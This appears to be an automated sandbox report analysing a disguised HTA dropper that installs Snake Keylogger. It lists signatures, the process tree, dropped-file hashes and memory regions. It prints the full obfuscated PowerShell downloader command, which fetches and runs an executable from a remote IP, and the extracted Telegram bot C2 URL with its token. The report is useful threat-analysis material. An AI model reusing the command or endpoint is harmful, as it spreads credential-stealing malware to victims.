Analysis

  • max time kernel
    143s
  • max time network
    205s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/10/2024, 01:40

General

  • Target

    16102024_0140_niceworkingprojectforeveryone.hta

  • Size

    165KB

  • MD5

    44ad3c49b38f4f6f1739baf86d528fd3

  • SHA1

    afcf27df0ee2373846a1f6b8027e9cfcea77c486

  • SHA256

    4e7237c56ca769460022e46e7585b630f9918be1cf427c180facd3edd22e6368

  • SHA512

    e2846bdafad1f3f2901171d3e3ca5744cd934ec6231bcef14327e17a8ac2aa225e254d25e1abca4a3465994979fa480b8f8a90be21754bb7a8f457d68102f691

  • SSDEEP

    96:Ea+n7bJh/qUh/qoR3hH+TJoAj/h/q9+SAT:Ea+7bJ5/pLA78WT

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

  • Snake Keylogger payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16102024_0140_niceworkingprojectforeveryone.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4228
    • C:\Windows\SysWOW64\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE
      "C:\Windows\sysTeM32\wINDowSPoweRSHell\V1.0\PoweRsHELl.ExE" "pOwerSHelL -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt ; IeX($(IEx('[sySTeM.tExt.EncOdInG]'+[cHaR]0x3a+[CHAR]58+'UTf8.geTstrINg([SySteM.coNVeRt]'+[CHar]0X3A+[Char]58+'frOmbase64striNG('+[cHar]34+'JHhzZ1dMTGJ3cHcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYmVSREVGSU5JdElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxR0Fnd2p0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbG9VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYnosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdnVEaE5SWGRkLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmtGUlVRQWIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiS2NkY3VuVHoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTE1URWdJVnBORyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHhzZ1dMTGJ3cHc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy4yNS8yNzAvdGFza2hvc3R3LmV4ZSIsIiRFTlY6QVBQREFUQVx0YXNraG9zdHcuZXhlIiwwLDApO1N0YVJ0LVNMRUVwKDMpO1NUYXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHRhc2tob3N0dy5leGUi'+[CHAR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3172
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPAss -NOP -w 1 -c deVICECreDENtIALDEpLoyMeNt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4168
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4044
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9069.tmp" "c:\Users\Admin\AppData\Local\Temp\dq3dlhag\CSCB35195D17B1A407FB26BE3F434266FBE.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3636
      • C:\Users\Admin\AppData\Roaming\taskhostw.exe
        "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:2364
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Users\Admin\AppData\Roaming\taskhostw.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:1148
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 744
          4⤵
          • Program crash
          PID:536
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2364 -ip 2364
    1⤵
      PID:3232

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoweRsHELl.ExE.log

            Filesize

            2KB

            MD5

            3d086a433708053f9bf9523e1d87a4e8

            SHA1

            b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

            SHA256

            6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

            SHA512

            931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            18KB

            MD5

            93aff0527ee852bd4f2758ff570a5bdd

            SHA1

            b2c2ec10c6e4227c42772d08246bfcc3054a707f

            SHA256

            63b2bd55be9abfbacc3e3de76d85d65fbbcb603662511d8cc27ad67fadc8c843

            SHA512

            b4be0c3b80c46f6c9c63748ac4e6c76e4853c4093cd201f6844560e05784386728c12fbde7a9f800ef147d7e715ac770b2cf98fb952ccfd3ee9a03bfba8568e9

          • C:\Users\Admin\AppData\Local\Temp\RES9069.tmp

            Filesize

            1KB

            MD5

            6477e6f0f98432e7062a98ae035d719d

            SHA1

            6f7f283a5edd8f65defd87d05df5a0bb4fdc1648

            SHA256

            ab3de7f0a290228a77605b599c4843c227a30c08e4b84ac3e604ee46cfa38d57

            SHA512

            9a69ba9a3fb093cccc63b47f68353efb11e9c65811efa3d2b704e68c7ccab99a13550cc8cb95072cf7b5df03cebdb629ac9de1404d84cd509cc01c5ab0f86def

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_35eytudp.rrb.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.dll

            Filesize

            3KB

            MD5

            c5e971606b36ef8ac72ae3bcb38999a0

            SHA1

            99d16e47077b23a073c43e8af25cc34bb759d358

            SHA256

            de910001bd7f26e9db5d21d3f374330bec8e05683d313faca2cbe00826481d14

            SHA512

            882720d24a5f4e1fe519801b23035ca4bc3ef96ec46fd71f33a1eed870136d4a2f5be010636538831cb6fcfec9664f97c243ac4baa0c454e8d6de3b0b4ecd0ce

          • C:\Users\Admin\AppData\Roaming\taskhostw.exe

            Filesize

            948KB

            MD5

            3e2f27edd3deacd8f08f6ed1133b2040

            SHA1

            060e3218949c5a006bb8607e8228e6539b737bfb

            SHA256

            163a25e2b68ed09eb4cf82f28c87568969091764bdfb4140b4675a00e2d2ed86

            SHA512

            da437c39e3337f6750c3b9353c71999c16415ec1fecdaa4bba676bb12207cb51a7258b91b175d1893ae4e9111fa9ccf027151ad7527d9d78df59f86436cfdb42

          • \??\c:\Users\Admin\AppData\Local\Temp\dq3dlhag\CSCB35195D17B1A407FB26BE3F434266FBE.TMP

            Filesize

            652B

            MD5

            3fe6ab35aa55017b445a67534b2aba81

            SHA1

            2b7a1729f880cf517f3e8a3d753c42f1496daaa7

            SHA256

            c80c593e93bf178016d47d1307b1584889fe9328429ae69453fdea9076272db9

            SHA512

            9178bd18bb93be708c5608dcc0ad0950d3ed143c9b41db091789464c6c2f132c0c9965bfa3826f49fbee332ae60e40048ff5a0ce0190c437f4f03d0a4e008900

          • \??\c:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.0.cs

            Filesize

            475B

            MD5

            ecc2c10cb4c5954e2d5156bce54e41f4

            SHA1

            2d7cde31f9942c1dc80c493c03d675962991bf31

            SHA256

            21d7b2d886e9a8c3cf70d60b612151ecf35df156524dda00bc5f0c14df45b3ac

            SHA512

            bfce3f87e8f97f1a8f149c7f3e172e312019a4189fd1e33bdb7d2c617c6bbf41f548e91c12f71b5e8215397138ea643430f0ee87d72b33760c0dd2e3b8ae4d96

          • \??\c:\Users\Admin\AppData\Local\Temp\dq3dlhag\dq3dlhag.cmdline

            Filesize

            369B

            MD5

            ce2ca4fde56c4f762eb195764e196332

            SHA1

            8beb6a3d549463ede47c2733af27229db814fdbd

            SHA256

            06fcbc079c63dde058bfe8c2cc733ac1f86aa4b0cfdc9864868016c4edeb57c7

            SHA512

            84f68ec0bf8ed38257a40e2f4bafec8dff9ab332568f36cf4b97fed7c5a771260de879dfeafc723f3aeb91e0e08d3d549da4bc963b2e911665d1c6a112ea820e

          • memory/1148-95-0x0000000006340000-0x0000000006502000-memory.dmp

            Filesize

            1.8MB

          • memory/1148-92-0x0000000000400000-0x0000000000426000-memory.dmp

            Filesize

            152KB

          • memory/1148-93-0x0000000004FA0000-0x000000000503C000-memory.dmp

            Filesize

            624KB

          • memory/1148-94-0x0000000006120000-0x0000000006170000-memory.dmp

            Filesize

            320KB

          • memory/1148-96-0x0000000006210000-0x00000000062A2000-memory.dmp

            Filesize

            584KB

          • memory/1148-97-0x00000000061D0000-0x00000000061DA000-memory.dmp

            Filesize

            40KB

          • memory/3172-73-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-17-0x00000000059B0000-0x0000000005D04000-memory.dmp

            Filesize

            3.3MB

          • memory/3172-1-0x0000000002670000-0x00000000026A6000-memory.dmp

            Filesize

            216KB

          • memory/3172-3-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-2-0x00000000051A0000-0x00000000057C8000-memory.dmp

            Filesize

            6.2MB

          • memory/3172-5-0x0000000004FB0000-0x0000000004FD2000-memory.dmp

            Filesize

            136KB

          • memory/3172-4-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-6-0x00000000058D0000-0x0000000005936000-memory.dmp

            Filesize

            408KB

          • memory/3172-89-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/3172-7-0x0000000005940000-0x00000000059A6000-memory.dmp

            Filesize

            408KB

          • memory/3172-18-0x0000000005F80000-0x0000000005F9E000-memory.dmp

            Filesize

            120KB

          • memory/3172-75-0x0000000008410000-0x00000000089B4000-memory.dmp

            Filesize

            5.6MB

          • memory/3172-74-0x0000000007350000-0x0000000007372000-memory.dmp

            Filesize

            136KB

          • memory/3172-0-0x0000000070C5E000-0x0000000070C5F000-memory.dmp

            Filesize

            4KB

          • memory/3172-65-0x0000000006520000-0x0000000006528000-memory.dmp

            Filesize

            32KB

          • memory/3172-19-0x0000000005FB0000-0x0000000005FFC000-memory.dmp

            Filesize

            304KB

          • memory/3172-71-0x0000000070C5E000-0x0000000070C5F000-memory.dmp

            Filesize

            4KB

          • memory/3172-72-0x0000000070C50000-0x0000000071400000-memory.dmp

            Filesize

            7.7MB

          • memory/4168-49-0x0000000007C40000-0x0000000007C5A000-memory.dmp

            Filesize

            104KB

          • memory/4168-29-0x0000000007780000-0x00000000077B2000-memory.dmp

            Filesize

            200KB

          • memory/4168-40-0x0000000007760000-0x000000000777E000-memory.dmp

            Filesize

            120KB

          • memory/4168-41-0x00000000077D0000-0x0000000007873000-memory.dmp

            Filesize

            652KB

          • memory/4168-42-0x0000000007F50000-0x00000000085CA000-memory.dmp

            Filesize

            6.5MB

          • memory/4168-50-0x0000000007C20000-0x0000000007C28000-memory.dmp

            Filesize

            32KB

          • memory/4168-30-0x000000006D510000-0x000000006D55C000-memory.dmp

            Filesize

            304KB

          • memory/4168-48-0x0000000007B40000-0x0000000007B54000-memory.dmp

            Filesize

            80KB

          • memory/4168-47-0x0000000007B30000-0x0000000007B3E000-memory.dmp

            Filesize

            56KB

          • memory/4168-46-0x0000000007B00000-0x0000000007B11000-memory.dmp

            Filesize

            68KB

          • memory/4168-45-0x0000000007B80000-0x0000000007C16000-memory.dmp

            Filesize

            600KB

          • memory/4168-44-0x0000000007970000-0x000000000797A000-memory.dmp

            Filesize

            40KB

          • memory/4168-43-0x0000000007900000-0x000000000791A000-memory.dmp

            Filesize

            104KB